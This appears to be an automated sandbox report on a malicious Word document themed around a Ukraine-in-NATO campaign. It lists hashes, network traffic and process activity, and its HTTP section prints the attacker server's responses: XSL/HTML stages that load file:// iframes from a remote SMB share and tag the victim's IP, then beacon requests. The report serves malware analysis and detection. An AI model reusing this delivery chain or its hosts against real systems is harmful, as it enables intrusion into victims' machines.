                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):196
                                                                                                                                          Entropy (8bit):3.731718693656962
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:rmHD/tH//lllK3yeM1y73ye0ZtzllmVl/tllGl1elHMDOJ1/zt:rmHW3HL73HItzKOlksDQD
                                                                                                                                          MD5:D6F46E706A361EEA4337CC2D1BE7A235
                                                                                                                                          SHA1:E5B2C0179E3BFE5A46B1E6A2327C0E627D1AFEAE
                                                                                                                                          SHA-256:9C68457DB47275DF55114EDDAEFC879F5C5AA39AEF323148AAEE8FBD076DB9FE
                                                                                                                                          SHA-512:67A9398A4255B2727D486C236C4F0205F3CE6E52A4C68852D110B1E97F4882FB79736C2E7EE4224228AC9368EA7602F1C8B9B7AACC809F9FDD93E085A21375F4
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:........t..........................k...6.3F..~4Z.....]..........+.H`...........k...6.3F..~4Z....,..l..@E....................P.......8.......................\.\.1.0.4...2.3.4...2.3.9...2.6.....d...

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:Microsoft Word 2007+
                                                                                                                                          Entropy (8bit):7.975913596069179
                                                                                                                                          TrID:
                                                                                                                                          • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                          • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                          • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                          File name:Overview_of_UWCs_UkraineInNATO_campaign.docx.doc
                                                                                                                                          File size:120'614 bytes
                                                                                                                                          MD5:d227874863036b8e73a3894a19bd25a0
                                                                                                                                          SHA1:2400b169ee2c38ac146c67408debc9b4fa4fca5f
                                                                                                                                          SHA256:a61b2eafcf39715031357df6b01e85e0d1ea2e8ee1dfec241b114e18f7a1163f
                                                                                                                                          SHA512:5304a8f4fce0718df717e67b0c91b3aef670f8fa226ee49dc23b72bb677301d310016626433ee8336f393f2afc92609f6c69c99862055c71316bef3f762714ed
                                                                                                                                          SSDEEP:3072:l7+cULFyt0l7P8trDG5CL1WvRC5pugMExFAiWRXlV:lPrtWuK5C8vE5puiFAimlV
                                                                                                                                          TLSH:68C312118381678FD3050A79E22DAF72F4B5D352D232A3CAAD42E36DAD8885357C56AC
                                                                                                                                          File Content Preview:PK..........!.........N......._rels/.rels ...(.................................................................................................................................................................................................................

                                                                                                                                          File Icon

                                                                                                                                          Icon Hash:39f5a98c818aacb3

                                                                                                                                          Network Behavior

                                                                                                                                          Network Port Distribution

                                                                                                                                          TCP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Jul 3, 2023 19:17:36.865119934 CEST4970880192.168.2.674.50.94.156
                                                                                                                                          Jul 3, 2023 19:17:36.963917017 CEST804970874.50.94.156192.168.2.6
                                                                                                                                          Jul 3, 2023 19:17:36.964085102 CEST4970880192.168.2.674.50.94.156
                                                                                                                                          Jul 3, 2023 19:17:36.964513063 CEST4970880192.168.2.674.50.94.156
                                                                                                                                          Jul 3, 2023 19:17:37.067236900 CEST804970874.50.94.156192.168.2.6
                                                                                                                                          Jul 3, 2023 19:17:37.067425966 CEST4970880192.168.2.674.50.94.156
                                                                                                                                          Jul 3, 2023 19:17:44.381493092 CEST4970880192.168.2.674.50.94.156
                                                                                                                                          Jul 3, 2023 19:17:44.520148039 CEST804970874.50.94.156192.168.2.6
                                                                                                                                          Jul 3, 2023 19:17:48.182789087 CEST804970874.50.94.156192.168.2.6
                                                                                                                                          Jul 3, 2023 19:17:48.182914972 CEST4970880192.168.2.674.50.94.156
                                                                                                                                          Jul 3, 2023 19:18:29.230432034 CEST4970880192.168.2.674.50.94.156
                                                                                                                                          Jul 3, 2023 19:18:29.370326996 CEST804970874.50.94.156192.168.2.6
                                                                                                                                          Jul 3, 2023 19:18:30.853779078 CEST804970874.50.94.156192.168.2.6
                                                                                                                                          Jul 3, 2023 19:18:30.854516983 CEST4970880192.168.2.674.50.94.156
                                                                                                                                          Jul 3, 2023 19:18:32.241492987 CEST4970880192.168.2.674.50.94.156
                                                                                                                                          Jul 3, 2023 19:18:32.380738020 CEST804970874.50.94.156192.168.2.6
                                                                                                                                          Jul 3, 2023 19:18:32.888693094 CEST804970874.50.94.156192.168.2.6
                                                                                                                                          Jul 3, 2023 19:18:32.888977051 CEST4970880192.168.2.674.50.94.156
                                                                                                                                          Jul 3, 2023 19:18:34.623435974 CEST4970880192.168.2.674.50.94.156
                                                                                                                                          Jul 3, 2023 19:18:34.725302935 CEST804970874.50.94.156192.168.2.6
                                                                                                                                          Jul 3, 2023 19:18:34.725552082 CEST4970880192.168.2.674.50.94.156

                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                          • 74.50.94.156

                                                                                                                                          HTTP Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          0192.168.2.64970874.50.94.15680C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Jul 3, 2023 19:17:36.964513063 CEST339OUTGET /MSHTML_C7/start.xml HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                          Host: 74.50.94.156
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jul 3, 2023 19:17:37.067236900 CEST341INHTTP/1.1 200 OK
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Last-Modified: Mon, 03 Jul 2023 14:29:04 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          ETag: "b4952ab8baadd91:0"
                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                          Date: Mon, 03 Jul 2023 17:17:36 GMT
                                                                                                                                          Content-Length: 576
                                                                                                                                          Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 3f 78 6d 6c 2d 73 74 79 6c 65 73 68 65 65 74 20 74 79 70 65 3d 27 74 65 78 74 2f 78 73 6c 27 20 68 72 65 66 3d 27 23 27 3f 3e 0d 0a 0d 0a 3c 78 73 6c 3a 73 74 79 6c 65 73 68 65 65 74 20 78 6d 6c 6e 73 3a 78 73 6c 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 57 44 2d 78 73 6c 22 20 78 6d 6c 6e 73 3a 78 73 6c 74 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 58 53 4c 2f 54 72 61 6e 73 66 6f 72 6d 22 20 72 65 73 75 6c 74 2d 6e 73 3d 22 22 3e 0d 0a 3c 78 73 6c 3a 74 65 6d 70 6c 61 74 65 20 6d 61 74 63 68 3d 22 2f 22 3e 0d 0a 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 37 22 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 0d 0a 3c 69 66 72 61 6d 65 20 73 72 63 3d 27 52 46 69 6c 65 2e 61 73 70 27 20 77 69 64 74 68 3d 27 38 30 30 27 20 68 65 69 67 68 74 3d 27 38 30 30 27 3e 3c 2f 69 66 72 61 6d 65 3e 0d 0a 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 27 27 3e 0d 0a 0d 0a 6c 74 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 36 30 29 3b 0d 0a 67 74 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 36 32 29 3b 0d 0a 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 3c 2f 78 73 6c 3a 74 65 6d 70 6c 61 74 65 3e 0d 0a 3c 2f 78 73 6c 3a 73 74 79 6c 65 73 68 65 65 74 3e
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><?xml-stylesheet type='text/xsl' href='#'?><xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl" xmlns:xslt="http://www.w3.org/1999/XSL/Transform" result-ns=""><xsl:template match="/"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=7"/></head><body><iframe src='RFile.asp' width='800' height='800'></iframe><script defer=''>lt=String.fromCharCode(60);gt=String.fromCharCode(62);</script></body></html></xsl:template></xsl:stylesheet>
                                                                                                                                          Jul 3, 2023 19:17:44.381493092 CEST413OUTGET /MSHTML_C7/RFile.asp HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Referer: http://74.50.94.156/MSHTML_C7/start.xml
                                                                                                                                          Accept-Language: en-US
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                          Host: 74.50.94.156
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jul 3, 2023 19:17:48.182789087 CEST413INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: private
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                          Set-Cookie: ASPSESSIONIDCSTDATTC=OPCBNNGBHENKOCPNEGOGNIPF; path=/
                                                                                                                                          Date: Mon, 03 Jul 2023 17:17:48 GMT
                                                                                                                                          Content-Length: 292
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 20 6f 6e 6c 6f 61 64 3d 73 65 74 54 69 6d 65 6f 75 74 28 27 66 78 28 29 27 2c 33 30 30 30 30 29 3e 3c 69 66 72 61 6d 65 20 73 72 63 3d 66 69 6c 65 3a 2f 2f 31 30 34 2e 32 33 34 2e 32 33 39 2e 32 36 2f 73 68 61 72 65 31 2f 4d 53 48 54 4d 4c 5f 43 37 3e 3c 2f 69 66 72 61 6d 65 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 66 78 28 29 20 7b 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 69 6e 6e 65 72 48 54 4d 4c 3d 27 3c 69 66 72 61 6d 65 20 73 72 63 3d 66 69 6c 65 3a 2f 2f 31 30 34 2e 32 33 34 2e 32 33 39 2e 32 36 2f 73 68 61 72 65 31 2f 4d 53 48 54 4d 4c 5f 43 37 2f 31 2f 38 34 2e 31 37 2e 35 32 2e 35 5f 34 66 36 35 37 5f 66 69 6c 65 30 30 31 2e 68 74 6d 3f 64 3d 38 34 2e 31 37 2e 35 32 2e 35 5f 34 66 36 35 37 5f 3e 3c 2f 69 66 72 61 6d 65 3e 27 3b 20 7d 20 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                          Data Ascii: <html><body onload=setTimeout('fx()',30000)><iframe src=file://104.234.239.26/share1/MSHTML_C7></iframe><script>function fx() { document.body.innerHTML='<iframe src=file://104.234.239.26/share1/MSHTML_C7/1/84.17.52.5_4f657_file001.htm?d=84.17.52.5_4f657_></iframe>'; } </script></body></html>
                                                                                                                                          Jul 3, 2023 19:18:29.230432034 CEST769OUTGET /MSHTML_C7/zip_k.asp?d=84.17.52.5_4f657_ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                          Host: 74.50.94.156
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jul 3, 2023 19:18:30.853779078 CEST771INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: private
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                          Set-Cookie: ASPSESSIONIDCSTDATTC=AADBNNGBMMLHHHBHDOHGHCFP; path=/
                                                                                                                                          Date: Mon, 03 Jul 2023 17:18:30 GMT
                                                                                                                                          Content-Length: 66
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 3c 2f 68 74 6d 6c 3e
                                                                                                                                          Data Ascii: <html>11111111111111111111111111111111111111111111111111111</html>
                                                                                                                                          Jul 3, 2023 19:18:32.241492987 CEST771OUTGET /MSHTML_C7/zip_k2.asp?d=84.17.52.5_4f657_ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                          Host: 74.50.94.156
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Cookie: ASPSESSIONIDCSTDATTC=AADBNNGBMMLHHHBHDOHGHCFP
                                                                                                                                          Jul 3, 2023 19:18:32.888693094 CEST772INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: private
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                          Date: Mon, 03 Jul 2023 17:18:32 GMT
                                                                                                                                          Content-Length: 66
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 3c 2f 68 74 6d 6c 3e
                                                                                                                                          Data Ascii: <html>11111111111111111111111111111111111111111111111111111</html>
                                                                                                                                          Jul 3, 2023 19:18:34.623435974 CEST772OUTGET /MSHTML_C7/zip_k3.asp?d=84.17.52.5_4f657_ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                          Host: 74.50.94.156
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Cookie: ASPSESSIONIDCSTDATTC=AADBNNGBMMLHHHBHDOHGHCFP
                                                                                                                                          Jul 3, 2023 19:18:34.725302935 CEST773INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: private
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                          Date: Mon, 03 Jul 2023 17:18:34 GMT
                                                                                                                                          Content-Length: 66
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 3c 2f 68 74 6d 6c 3e
                                                                                                                                          Data Ascii: <html>11111111111111111111111111111111111111111111111111111</html>


                                                                                                                                          Statistics

                                                                                                                                          CPU Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          Memory Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          High Level Behavior Distribution

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Behavior

                                                                                                                                          Click to jump to process

                                                                                                                                          System Behavior

                                                                                                                                          General

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:19:17:20
                                                                                                                                          Start date:03/07/2023
                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                          Imagebase:0x140000
                                                                                                                                          File size:1'937'688 bytes
                                                                                                                                          MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          General

                                                                                                                                          Target ID:1
                                                                                                                                          Start time:19:17:36
                                                                                                                                          Start date:03/07/2023
                                                                                                                                          Path:C:\Windows\splwow64.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\splwow64.exe 12288
                                                                                                                                          Imagebase:0x7ff726350000
                                                                                                                                          File size:130'560 bytes
                                                                                                                                          MD5 hash:8D59B31FF375059E3C32B17BF31A76D5
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Disassembly

                                                                                                                                          No disassembly